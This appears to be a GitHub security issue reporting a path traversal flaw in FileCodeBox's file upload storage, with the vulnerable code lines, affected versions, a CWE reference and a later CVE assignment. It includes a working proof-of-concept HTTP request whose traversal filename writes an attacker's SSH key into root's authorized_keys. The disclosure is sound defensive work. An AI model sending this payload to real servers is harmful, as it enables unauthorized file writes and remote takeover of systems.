[SECURITY] path traversal leads to arbitrary file write when using filesystem storage

[Cycloctane]

Describe the bug

get_file_path_name and SystemFileStorage.save_file directly use filename from user input without any validation and concat strings to generate the final save_path and save files. This is extremely vulnerable to path traversal and allows arbitrary file writes.

FileCodeBox/apps/base/utils.py

Lines 28 to 29 in 1733111

	save_path = f"{path}/{file.filename}"
	return path, suffix, prefix, file.filename, save_path

FileCodeBox/core/storage.py

Lines 78 to 81 in 1733111

	save_path = self.root_path / save_path
	if not save_path.parent.exists():
	save_path.parent.mkdir(parents=True)
	await asyncio.to_thread(self._save, file.file, save_path)

PoC

An attcker can perform arbitrary file writes by sending a multipart request with malicious filename.

POST /share/file/ HTTP/1.1
Host: 127.0.0.1:12345
Content-Type: multipart/form-data; boundary=----8f188eaea17e2acaad37ec700ad01edd

------8f188eaea17e2acaad37ec700ad01edd
Content-Disposition: form-data; name="file"; filename="../../../../../../../../root/.ssh/authorized_keys2"
Content-Type: text/plain

ssh-rsa AAAA...

------8f188eaea17e2acaad37ec700ad01edd
Content-Disposition: form-data; name="expire_value"

1
------8f188eaea17e2acaad37ec700ad01edd
Content-Disposition: form-data; name="expire_style"

minute
------8f188eaea17e2acaad37ec700ad01edd--

Affected versions

<= 2.2

Additional context

CWE-23

[vastsa]

thanks

[Cycloctane]

Assigned CVE-2025-51661